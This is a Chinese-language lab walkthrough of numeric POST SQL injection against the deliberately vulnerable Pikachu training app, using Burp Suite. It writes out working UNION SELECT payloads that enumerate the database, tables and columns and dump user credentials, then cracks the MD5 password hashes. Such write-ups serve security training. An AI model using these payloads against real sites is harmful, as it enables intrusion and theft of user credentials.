Pikachu--数字型注入(post)

Pikachu--数字型注入(post)

  1. 进入页面

输入 127.0.0.1/pikachu 选择sql注入(数字型)

Pikachu--数字型注入(post)_第1张图片

2)打开foxy代理,输入值“1”进行bp抓包

Pikachu--数字型注入(post)_第2张图片

Pikachu--数字型注入(post)_第3张图片

3)将这个获取的包转发到Repeater中

Pikachu--数字型注入(post)_第4张图片

判断注入点

4)用单引号“’”,判断有无注入点,再点击Send获取结果

Pikachu--数字型注入(post)_第5张图片

5)输入id=1 and 1=2 返回结果报错

Pikachu--数字型注入(post)_第6张图片

6)id=1 and 1=1 回显正常,存在注入点,验证了数字型注入。

Pikachu--数字型注入(post)_第7张图片
判断返回字段数

Pikachu--数字型注入(post)_第8张图片

Pikachu--数字型注入(post)_第9张图片

判断返回结果有2列,返回3列报错,说明有2列

查询数据库名

id=1’ union select database(),version()#

Pikachu--数字型注入(post)_第10张图片

得到数据库名为pikachu

获取表名

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

Pikachu--数字型注入(post)_第11张图片

得到表名有:httpinfo,member,message,users,xssblind

查询字段名

id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

Pikachu--数字型注入(post)_第12张图片
查询字段值

id=1 union select username,password from users#

Pikachu--数字型注入(post)_第13张图片
最后结果

发现密码被md5加密了,我们通过md5在线转换网站(https://www.cmd5.com/)获得

Pikachu--数字型注入(post)_第14张图片

对应账号和MD5加密的密码:

admin:e10adc3949ba59abbe56e057f20f883e(123456)

pikachu:670b14728ad9902aecba32e22fa4f6bd(000000)

test:e99a18c428cb38d5f260853678922e03(abc123)

你可能感兴趣的:(SQL注入,数据库,oracle,sql)